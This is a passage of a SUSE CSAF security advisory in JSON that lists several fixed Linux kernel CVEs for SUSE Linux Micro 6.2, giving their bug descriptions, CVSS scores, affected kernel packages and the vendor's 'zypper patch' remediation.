"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
